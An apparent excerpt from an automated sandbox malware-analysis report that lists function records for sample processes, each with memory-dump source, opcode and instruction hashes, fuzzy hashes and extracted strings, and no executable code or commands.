                              • Opcode ID: 33fe4660e11d2eaaaf030761e81fd2fcc869d50c2230ab984c8bcd437f52b76f
                              • Instruction ID: 995137bf95ad4721f09379de4ba16d1d7e9bfcf17c7e5bf165fda76ead1dc56f
                              • Opcode Fuzzy Hash: 33fe4660e11d2eaaaf030761e81fd2fcc869d50c2230ab984c8bcd437f52b76f
                              • Instruction Fuzzy Hash: 9E017121B2DD268BE759B73C58695BCB3C2EB88751BA0007DF40EC33D7DD29A8425B81
                              Function 00007FFF60F6D8FA Relevance: .1, Instructions: 51COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 24bbabdf21235710c32efaff7f04e9061d668b0a8e4e5386ada070e9b9237c97
                              • Instruction ID: d1d62aee8dbeecfa6b5b862561bd3af71d90a5b17a1e058f491c925e5ea4a39d
                              • Opcode Fuzzy Hash: 24bbabdf21235710c32efaff7f04e9061d668b0a8e4e5386ada070e9b9237c97
                              • Instruction Fuzzy Hash: 3C016221F2991A9FE798AB7C98692BC67D2EF59701B5400B9F80DD3397ED285C418340
                              Function 00007FFF60F6E2D0 Relevance: .1, Instructions: 51COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2bd1b88763f9b2f36a34940f4bd754c7c29ee48683232b2934667475372c1bed
                              • Instruction ID: b1d7ccfa2aa51bf98065b21f58288ac68d86f25fecf97d5b08e81c1d0e9efa6e
                              • Opcode Fuzzy Hash: 2bd1b88763f9b2f36a34940f4bd754c7c29ee48683232b2934667475372c1bed
                              • Instruction Fuzzy Hash: ADF0B42AE2C4295BF66C159D78411F567C8EB5A735F29117EF98ED33C2EC0A2C5201C2
                              Function 00007FFF60F61448 Relevance: .0, Instructions: 47COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a7b585d86f79bce33d1e957ca61617167166d6dfb579c5d746009430c3a259d6
                              • Instruction ID: d40027ee100391d6a78ff5353bfec98c02e73eb095470dd311e7a1d540dcb25c
                              • Opcode Fuzzy Hash: a7b585d86f79bce33d1e957ca61617167166d6dfb579c5d746009430c3a259d6
                              • Instruction Fuzzy Hash: 26017C2AD1C46A96EB6CE218E8023B973C1DF12715F601278E01DC33C1EF2D741A4293
                              Function 00007FFF60F6D7A0 Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2d3a7838f01c2b0a0d011dd7a47eba82400d286146882472ca72356c3779da03
                              • Instruction ID: 125ee5b43e1135423b39d29922fcaff1ce1a496c01d0e0258a3eb5ba5b82fb65
                              • Opcode Fuzzy Hash: 2d3a7838f01c2b0a0d011dd7a47eba82400d286146882472ca72356c3779da03
                              • Instruction Fuzzy Hash: 25F06225E2D8178AF764B62DA84567D22D5DF84791F740535F50EC73C6EC1CA8825382
                              Function 00007FFF60F621FE Relevance: .0, Instructions: 44COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d181bceea509f0546d1f360a68dcd2e13074a506fef33990a8f3c86b33a85870
                              • Instruction ID: b4e9fc767f5da45cc99492727113956bf8e2542c7abca884c376251cfb869c77
                              • Opcode Fuzzy Hash: d181bceea509f0546d1f360a68dcd2e13074a506fef33990a8f3c86b33a85870
                              • Instruction Fuzzy Hash: D0010820D3C80791FFE8A560986A27523C8DF25345F705538F948D27D2AE1FBC2A7192
                              Function 00007FFF60F68EA0 Relevance: .0, Instructions: 44COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ce875f31aebe418533ad35de68d16cfc8f5e1f57df916f81a71d5ec5b19323fd
                              • Instruction ID: 2f76d16d04cebe706cd4215b7f2baa01523dfae00de11c5b19d31d030ebb8445
                              • Opcode Fuzzy Hash: ce875f31aebe418533ad35de68d16cfc8f5e1f57df916f81a71d5ec5b19323fd
                              • Instruction Fuzzy Hash: EA017131B1C458CFEB50D7ACD0945EC7BE1EFAA310F2805BAD00DE7291CD6A98629705
                              Function 00007FFF60F6BB51 Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5dad153b09a4a8c0b51e3bd79e9fbfbc5379dabc059a6fdb4882e702fe1636ba
                              • Instruction ID: b801622128963c396b4f677305d1a6635a2206154c5ec9caff4991b8b5c47434
                              • Opcode Fuzzy Hash: 5dad153b09a4a8c0b51e3bd79e9fbfbc5379dabc059a6fdb4882e702fe1636ba
                              • Instruction Fuzzy Hash: D6F0B426D2D6434BF72446109CA60EC73D4EF91351FB84976F888872D6EC1D28CB53D6
                              Function 00007FFF60F63450 Relevance: .0, Instructions: 42COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 23606948914103c4a5226d6f5b3b75be4213fc07c18d97b1661f231ee4d0242a
                              • Instruction ID: 6a265a1c751c79904cff7348ed5c7b5305b011d89527b93ad6458d20fa295a27
                              • Opcode Fuzzy Hash: 23606948914103c4a5226d6f5b3b75be4213fc07c18d97b1661f231ee4d0242a
                              • Instruction Fuzzy Hash: B5F0EC16C3C83685FEA1B668919C2B893C8EF55361F6A04B0F89D773C2CD1D2D5431D5
                              Function 00007FFF60F699FB Relevance: .0, Instructions: 41COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f55fbef695eff91fe93fdc95a5ec9a6fb2b51dd2a5262df87dd79be1a362fabc
                              • Instruction ID: 63a5f0ea7d47f4591a9f18db188b57701d80927759ed9d3b9086f54ed7806eae
                              • Opcode Fuzzy Hash: f55fbef695eff91fe93fdc95a5ec9a6fb2b51dd2a5262df87dd79be1a362fabc
                              • Instruction Fuzzy Hash: 52F0823092DA968FE752976894585747FE4EF1B340B1900F7E48DCB2E3ED086C459342
                              Function 00007FFF60F6E5DB Relevance: .0, Instructions: 37COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 50ea1368b262792ce7c3575071c0505f186d0f5108ca5eaf7cd9af25b626a457
                              • Instruction ID: d85013401b81126c88967ae8b709ab5d7399eac640233a9dd657a58358d3e637
                              • Opcode Fuzzy Hash: 50ea1368b262792ce7c3575071c0505f186d0f5108ca5eaf7cd9af25b626a457
                              • Instruction Fuzzy Hash: 70F02412D2C53A0AFB94B628E4891BD73D0DB64310F890478E84DE73C1ED1D7D804BC2
                              Function 00007FFF60F63AB8 Relevance: .0, Instructions: 34COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f5ec2347ffe1f851abc9a0ad5900f9fc2e0de05dc9b5810c155b10c328e777e4
                              • Instruction ID: b533599d96b89878f3d50a86b1dd374fa6cb1e914763b2fe3c66f687e372ab33
                              • Opcode Fuzzy Hash: f5ec2347ffe1f851abc9a0ad5900f9fc2e0de05dc9b5810c155b10c328e777e4
                              • Instruction Fuzzy Hash: 87E0ED80E2DD0A46EAA85229545927A22C9DFDA320F78037EF60EC33C5DC9D5C836295
                              Function 00007FFF60F68745 Relevance: .0, Instructions: 31COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb57c505d4e4657d8edd8909d926a3628eede1c9a1a033e098cbd7344f8e58b6
                              • Instruction ID: ca3ac60a531d63277e842d32e0133238d9e530eef1718e8e2df972d4ba0fe72d
                              • Opcode Fuzzy Hash: eb57c505d4e4657d8edd8909d926a3628eede1c9a1a033e098cbd7344f8e58b6
                              • Instruction Fuzzy Hash: 32E06D30A3C81ACFEA60E76CD0845B837D8EF4D310F6404B5E00ACB2D1DD1CAC816281
                              Function 00007FFF60F6353E Relevance: .0, Instructions: 30COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 20e8f01ced48c88a6954c939f663907787966d9abf70e7a1084838bdfee28375
                              • Instruction ID: 6f884f1a23580bff9bac3b758e480cf71036f8bdc8e1740f293fe883cbdb1669
                              • Opcode Fuzzy Hash: 20e8f01ced48c88a6954c939f663907787966d9abf70e7a1084838bdfee28375
                              • Instruction Fuzzy Hash: BBE09B31E1D1674AFB74653C90112B852C5DF88365F1900F6ED0DC73C1EC1C5C815781
                              Function 00007FFF60F6D9F8 Relevance: .0, Instructions: 29COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 241ea4d7c25596064a491c5240b71429ce8859c9be42b51b6b1848e5142929a0
                              • Instruction ID: 5c50cdb262c93c171bcdae1c7492a880590ae2f6a7a800c555463ce4412370a9
                              • Opcode Fuzzy Hash: 241ea4d7c25596064a491c5240b71429ce8859c9be42b51b6b1848e5142929a0
                              • Instruction Fuzzy Hash: 85E04600B2D9195BE7D8B73C08AA2B863C3DBDC211750407AE80EC33A7DC28AC462B80
                              Function 00007FFF60F6C98F Relevance: .0, Instructions: 21COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 229b230fb087299f4ec8219fdb12836ab91b44e5e0f6c4bfca3c2b822cc03c5c
                              • Instruction ID: 4b1758090a69e349f155ac5075b19bd6fdfe39c77e997556b2f0a30916c452d8
                              • Opcode Fuzzy Hash: 229b230fb087299f4ec8219fdb12836ab91b44e5e0f6c4bfca3c2b822cc03c5c
                              • Instruction Fuzzy Hash: 7AD05E3366D5144DEB08A358F8435F8B3C0E781230B50153BE20AC2143EC1624134644
                              Function 00007FFF60F6D6EF Relevance: .0, Instructions: 20COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b5333017788a872e91455cb9a42c9dd8329239c97b3a7d763608113d7d294990
                              • Instruction ID: 7df74d14053807363e5a4657c203222f058dccc30c8a826db4a6ad6ddbafe12a
                              • Opcode Fuzzy Hash: b5333017788a872e91455cb9a42c9dd8329239c97b3a7d763608113d7d294990
                              • Instruction Fuzzy Hash: B5D0A712B2C81F865990B24C34451FD93D2DBC4171BA40373D10EC2146CD1624434282
                              Function 00007FFF60F68613 Relevance: .0, Instructions: 18COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5296655262526c36cb3e9d2cd0ebfbccfe4d3416d103c2f67216e330850a0eb5
                              • Instruction ID: 50bf5c0699591f85d9722c696fe7c234d859cdd2c55fd27bd3002215643538ff
                              • Opcode Fuzzy Hash: 5296655262526c36cb3e9d2cd0ebfbccfe4d3416d103c2f67216e330850a0eb5
                              • Instruction Fuzzy Hash: 38D0121671CD082B1640E15D584A6B963D2D7E8261728417AA40DC3665DD24D9879242
                              Function 00007FFF60F6BD16 Relevance: .0, Instructions: 18COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 23d63ea2386065abcd6334010c419a22cb69ddcc4cd31e0605ad4786d439dbf2
                              • Instruction ID: 3df54b77a3d28a7c1d46d482f5adeab259ce4febe233d0eb46a06c47fe44ce0a
                              • Opcode Fuzzy Hash: 23d63ea2386065abcd6334010c419a22cb69ddcc4cd31e0605ad4786d439dbf2
                              • Instruction Fuzzy Hash: 7FD05E3161D91DCEDB95A768A4553ED77A0FF45701F90097AF10AC6281CF3A84E4C780
                              Function 00007FFF60F6C41E Relevance: .0, Instructions: 18COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b7d62794a51fd13b0ea19724b900f63116deca054b2751469d4068de755d8c81
                              • Instruction ID: d1bc007bb359178915f0cb17f97cd9eeb212bbfb2a6384c11ab146974aa5a0b5
                              • Opcode Fuzzy Hash: b7d62794a51fd13b0ea19724b900f63116deca054b2751469d4068de755d8c81
                              • Instruction Fuzzy Hash: EED0C900B28C1D5A76C9B228006A2BE41C7EBD92817644079F40EC33E3ED2C58432302
                              Function 00007FFF60F68330 Relevance: .0, Instructions: 17COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: da9044bccef4cbb4a6a351cbc2f5c781c1b588e09ab93eef0511635dad22753a
                              • Instruction ID: 9cb2665cd1153bca6cffda99de0a12fda21aae8ab605bc4f70f7a760715504eb
                              • Opcode Fuzzy Hash: da9044bccef4cbb4a6a351cbc2f5c781c1b588e09ab93eef0511635dad22753a
                              • Instruction Fuzzy Hash: 55D0A73161F3458EF719277559156E877A0DE45255B5804FEE808C82D3E82EC1D28341
                              Function 00007FFF60F6B593 Relevance: .0, Instructions: 9COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2c853be64ce9d9c4c62076938cb5eb25686f4bfe4ce3f1ae0c868ae3877c28f4
                              • Instruction ID: 2cfb780ef72b80775f4a2b67cd43c8ae2f46f81e91b153a02c909ac971852cac
                              • Opcode Fuzzy Hash: 2c853be64ce9d9c4c62076938cb5eb25686f4bfe4ce3f1ae0c868ae3877c28f4
                              • Instruction Fuzzy Hash: 5AB0121223A8086AA345EB18C45F1F933D0FB6C201B440D3AB48ED22A5FC04AA819389
                              Function 00007FFF60F6CE05 Relevance: .0, Instructions: 8COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ebd4a8e329742e5237db11218f5a667f8173d4cc0c06eb07c37b914c535174c4
                              • Instruction ID: 4519ce27facac357d46877acc1d5b1a1d0c0dbb628b6b4b3de6ad867aabfb470
                              • Opcode Fuzzy Hash: ebd4a8e329742e5237db11218f5a667f8173d4cc0c06eb07c37b914c535174c4
                              • Instruction Fuzzy Hash: A2A002236C682D05A54410DE3C530D4F249C9D507978B2457E95CDAE40D69B8AF24281
                              Function 00007FFF60F6CF74 Relevance: .0, Instructions: 8COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e46dfe910930e065bfeb2a3c88374df23bbed8bd1ea5ac920918c05f117e00c8
                              • Instruction ID: 5ae0223628ea77e5ac5d6f3ea02ae4b5d64683994485943d1ffe019eda6da6cf
                              • Opcode Fuzzy Hash: e46dfe910930e065bfeb2a3c88374df23bbed8bd1ea5ac920918c05f117e00c8
                              • Instruction Fuzzy Hash: CAA02203B8882000A200008CBC030C8F32088C0030B8B2223E828C8A88C08A80C30080

                              Non-executed Functions

                              Function 00007FFF60F60928 Relevance: 5.0, Strings: 4, Instructions: 22COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID: S;$![;$"c;$#k;
                              • API String ID: 0-1519754266
                              • Opcode ID: 927ef3f6ee77cfd0d1d7d2b324879cbb5d35c92d40a9d571224466cd34d85ace
                              • Instruction ID: 7b781405c80ffc83b77c4bbf1dd834ad16f6fdaf698122341e5f39c7b5bbf85e
                              • Opcode Fuzzy Hash: 927ef3f6ee77cfd0d1d7d2b324879cbb5d35c92d40a9d571224466cd34d85ace
                              • Instruction Fuzzy Hash: 09D05E17B34C3B019605AB9DB4620F8A3C4E6C61F32908673E501C22A65252745BC2E1

                              Executed Functions

                              Function 00007FFF60F421D9 Relevance: 3.7, Strings: 2, Instructions: 1241COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID: C.N_^$k/N_^
                              • API String ID: 0-1383031627
                              • Opcode ID: fc0fe4644f9e2a0c6b6e6cbaedc54480e539521184387753b7670b222f73b184
                              • Instruction ID: 43c0b4e4d0a53695fb463b65ee2f2ddcc0a2edb17f05ac4c7833687126c05c78
                              • Opcode Fuzzy Hash: fc0fe4644f9e2a0c6b6e6cbaedc54480e539521184387753b7670b222f73b184
                              • Instruction Fuzzy Hash: 1E92E020F1C6478BFB99A72888A52793BE2EF96305FA50475D80EC33D7DD2DAC468351
                              Function 00007FFF60F4DC85 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID: gM_^
                              • API String ID: 0-1309094749
                              • Opcode ID: d21b759773798bc212917d0481ac2623701522736ad84d9d0fb011696f280fa5
                              • Instruction ID: 0de0c5cdcfd14e36e560b68c2ac3f5b99b555f00db1538db60ae84ac6fcc07d0
                              • Opcode Fuzzy Hash: d21b759773798bc212917d0481ac2623701522736ad84d9d0fb011696f280fa5
                              • Instruction Fuzzy Hash: 2EA17D32E1C93BCAEB69FB2C94916BC73D1EF98715BA00175D80AD7387DE2878059790
                              Function 00007FFF60F49369 Relevance: .5, Instructions: 499COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 431068246b1d19acacb9a0a9488bcd0b8dfeddac8b703a7022358ebd355474b2
                              • Instruction ID: 42264d3522fd5f915017f9bc28ca8bfba3a805a079b892cd57275eb8ad200c27
                              • Opcode Fuzzy Hash: 431068246b1d19acacb9a0a9488bcd0b8dfeddac8b703a7022358ebd355474b2
                              • Instruction Fuzzy Hash: 9FF1B625D1D6878FFB1AA76488522F57BE0DF52310F2941BED48AC72D7ED1CA40B8392
                              Function 00007FFF60F4E470 Relevance: .3, Instructions: 268COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4dc3fe34d56312d28766f34cbc7f205231d2105d0e24aa7a2e0b656f1ec8aa88
                              • Instruction ID: 7c6acfa91436f7a500f9ee0a10c13787e0dfc92493e6cac2042f110e422d407e
                              • Opcode Fuzzy Hash: 4dc3fe34d56312d28766f34cbc7f205231d2105d0e24aa7a2e0b656f1ec8aa88
                              • Instruction Fuzzy Hash: E1818365D0D2C28FE76AD22498162747BE0DF56315F2A05BBD98CC72D3FE1D680E4392
                              Function 00007FFF60F43280 Relevance: 22.7, Strings: 18, Instructions: 177COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID: #$#$"#$"#$&#$-#$-#$1#$1#$7#$;#$;#$=#$=#$F#$F#$M#$M#
                              • API String ID: 0-1298366103
                              • Opcode ID: f94ba1bef7992858dce92f9c3e3e16306b6cf9b8a82f09d71ca4b346d9de48d4
                              • Instruction ID: e0e072ec3f5c48b3b96522d38f73fcaeae58056dc0826b730dc56768b6cb8c09
                              • Opcode Fuzzy Hash: f94ba1bef7992858dce92f9c3e3e16306b6cf9b8a82f09d71ca4b346d9de48d4
                              • Instruction Fuzzy Hash: 1B51E920C1C0169AF37D9668E48B0B573C4FB55710F34107CDCEA826C7BC1C6EAA4297
                              Function 00007FFF60F415A8 Relevance: 2.6, Strings: 2, Instructions: 122COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID: .N_^$#2N_^
                              • API String ID: 0-823581164
                              • Opcode ID: a1da4b06eca2f5c548afea7c659fc4ec48bb96caa81e076ffbf8b99668964203
                              • Instruction ID: 995ad23acd6d91b02ef32f4dd3ff144fa4dd63f44d1ae0de61faf4d2da07753f
                              • Opcode Fuzzy Hash: a1da4b06eca2f5c548afea7c659fc4ec48bb96caa81e076ffbf8b99668964203
                              • Instruction Fuzzy Hash: 97314F12E0C13746F7147A6CA8A22FA77C0DF94235F640576DA8DC62C3ED0D6A9743D6
                              Function 00007FFF60F4DF7B Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID: H
                              • API String ID: 0-2852464175
                              • Opcode ID: 2dc5a66c2b5b9030f855d4b2aae0f0b2118bab6d913321466c9a59e8dd912203
                              • Instruction ID: 3bee2e85b5501ee6e9ea9658f7ad0d9832533bd59d100cb6010303578d7c96b5
                              • Opcode Fuzzy Hash: 2dc5a66c2b5b9030f855d4b2aae0f0b2118bab6d913321466c9a59e8dd912203
                              • Instruction Fuzzy Hash: 51312A21E1C92BCAEBA9E7688051ABC63D1EF58704F640138ED1EE33C3ED5CAC059790
                              Function 00007FFF60F42284 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000021.00000002.1193228737.00007FFF60F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_33_2_7fff60f40000_z4wwumki.jbxd
                              Similarity
                              • API ID:
                              • String ID: C.N_^
                              • API String ID: 0-3690049648
                              • Opcode ID: 365c19376b33d8b0e14e4516908d25301d6f06f6748e54ac54c194a98afa654a
                              • Instruction ID: ceccffa53eda6601f3e6c0770c69f779d68a454be9ad4593b229c6225d7645d1
